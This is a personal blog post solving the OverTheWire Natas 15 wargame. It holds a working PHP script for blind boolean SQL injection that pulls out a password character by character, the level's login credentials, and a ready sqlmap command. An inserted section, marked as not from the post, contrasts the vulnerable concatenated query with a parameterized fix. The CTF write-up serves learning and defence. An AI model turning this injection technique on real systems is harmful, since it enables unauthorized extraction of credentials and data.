Daniels Blog
13 Dec 2016

Overthewire Wargame – Natas 15 [spoiler]

This is my solution for Natas 15 (http://overthewire.org/wargames/natas/natas15.html).
This was my first attempt at a blind SQL injection, so it took some time and reading to
finally succeed. This very nice writeup taught me the technique I am using in my code: (http://sqlinjections.blogspot.de/2009/04/sql-injection-tutorial-by-marezzi-mysql.html)

Natas 15 was really fun. I learned a lot and I couldn't believe that I finally made it work (after 6 hours or so) 😉

#!/usr/bin/php
<?php
// Blind boolean SQL injection against Natas 15: the page only tells you whether a
// user "exists" or "doesn't exist", so every request leaks exactly one true/false answer.

// Sends one probe in the username parameter. Returns 1 when the page reports that
// the user exists (the injected condition was true) and 0 when it reports "doesn't exist".
function send_req($inject)
{
    $u = "natas15";
    $p = "AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J";

    $inject = urlencode($inject);
    $url = "http://$u:$p@natas15.natas.labs.overthewire.org/?username=$inject&debug=1";

    // file() needs allow_url_fopen; the HTTP basic-auth credentials are carried in the URL.
    // The whole response body is searched, so the check does not depend on a fixed line number.
    $data = implode("", file($url));

    return (strpos($data, "doesn't") === false) ? 1 : 0;
}

// Recovers the character at position $offset of the natas16 password by asking
// "is its ASCII code greater than $char?" for increasing $char. The first value for
// which the answer is false is the character itself.
function probe_offset($offset)
{
    $char = 47;

    while ($char < 130) {
        $inj = 'natas16" and ascii(substring((SELECT password from users where username="natas16"),' . $offset . ',1))>' . $char . '-- -';
        $res = send_req($inj);

        echo ".";
        if ($res == 0) {
            return chr($char);
        }
        $char++;
    }

    // No character in the probed range matched.
    return null;
}

$pass = "";
$offset = 1;
while ($offset < 33) {          // the password is 32 characters long
    $good = probe_offset($offset);
    echo $good;
    $offset++;
    $pass .= $good;
}

echo "\n\n Here we go :) $pass  \n\n";
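To show the defender's side of the same bug, here is an added example that is not from this post or the challenge: a constructed SQLite stand-in for the users lookup, with the string-concatenated query next to a parameterized one, and the post's boolean probe rewritten in single-quote/SQLite form (unicode() standing in for MySQL's ascii()). The table contents and the password value are made up.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed in-memory stand-in for the Natas 15 users table (assumed schema;
    # the password below is invented, not the real natas16 password).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("natas15", "not-the-real-one"), ("natas16", "Zz9example")])
    return db


def user_exists_vulnerable(db, username: str) -> bool:
    # String concatenation: attacker-controlled text becomes part of the SQL,
    # and the exists/doesn't-exist answer now depends on the injected condition.
    query = "SELECT * FROM users WHERE username='" + username + "'"
    return db.execute(query).fetchone() is not None


def user_exists_fixed(db, username: str) -> bool:
    # Bound parameter: the whole input is compared as one literal username value,
    # so the probe text can never change the shape of the query.
    row = db.execute("SELECT 1 FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None


def probe(offset: int, char: int) -> str:
    # The blog script's probe, adapted to single quotes and SQLite's unicode().
    return ("natas16' AND unicode(substr((SELECT password FROM users "
            f"WHERE username='natas16'),{offset},1)) > {char}-- -")


def oracle_leaks(db, check) -> bool:
    # True when the answer flips with the probe's threshold, i.e. the endpoint
    # works as a one-bit oracle. The first invented password character is 'Z' (90).
    return check(db, probe(1, 89)) != check(db, probe(1, 90))
```

With the concatenated query `oracle_leaks` is true and the password can be read out one comparison at a time; with the parameterized query both probes are just non-existent usernames and the answer never flips.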




If you are lazy, you could have used sqlmap:

sqlmap -u natas15.natas.labs.overthewire.org/index.php?username=natas16 --auth-cred=natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J --auth-type=Basic --dbms=mysql --string=exists --level=3  --batch --current-db -T users -D natas15 -a

Published under: Linux